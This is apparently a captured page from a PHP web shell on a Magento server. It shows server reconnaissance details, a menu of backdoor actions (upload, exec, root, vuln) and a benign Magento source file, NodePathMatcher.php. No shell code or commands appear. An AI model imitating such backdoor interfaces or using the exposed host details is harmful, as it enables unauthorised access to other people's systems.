Kernel : Linux vmi616275.contaboserver.net 5.4.0-84-generic #94-Ubuntu SMP Thu Aug 26 20:27:37 UTC 2021 x86_64
Disable function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Safe mode : OFF
Host : diestoffstrasse.com | Server ip : 127.0.0.1 | Your ip : 127.0.0.1 | Time @ Server : 24 Aug 2025 15:19:11
MySQL : OFF | MSSQL : OFF | cURL : ON | Oracle : OFF | wget : ON | Perl : ON

/home/dev2.destoffenstraat.com/vendor-1/magento/framework/Config/Dom/

HOME about upload exec mass file domain root vuln newfile newfolder kill me

File Path : /home/dev2.destoffenstraat.com/vendor-1/magento/framework/Config/Dom/NodePathMatcher.php

<?php /** * Copyright © Magento, Inc. All rights reserved. * See COPYING.txt for license details. */ namespace Magento\Framework\Config\Dom; /** * Matching of XPath expressions to path patterns */ class NodePathMatcher { /** * Whether a subject XPath matches to a given path pattern * * @param string $pathPattern Example: '/some/static/path' or '/some/regexp/path(/item)+' * @param string $xpathSubject Example: '/some[@attr="value"]/static/ns:path' * @return bool */ public function match($pathPattern, $xpathSubject) { $pathSubject = $this->simplifyXpath($xpathSubject); $pathPattern = '#^' . $pathPattern . '$#'; return (bool)preg_match($pathPattern, $pathSubject); } /** * Strip off predicates and namespaces from the XPath * * @param string $xpath * @return string */ protected function simplifyXpath($xpath) { $result = $xpath; $result = preg_replace('/\[@[^\]]+?\]/', '', $result); $result = preg_replace('/\/[^:]+?\:/', '/', $result); return $result; } }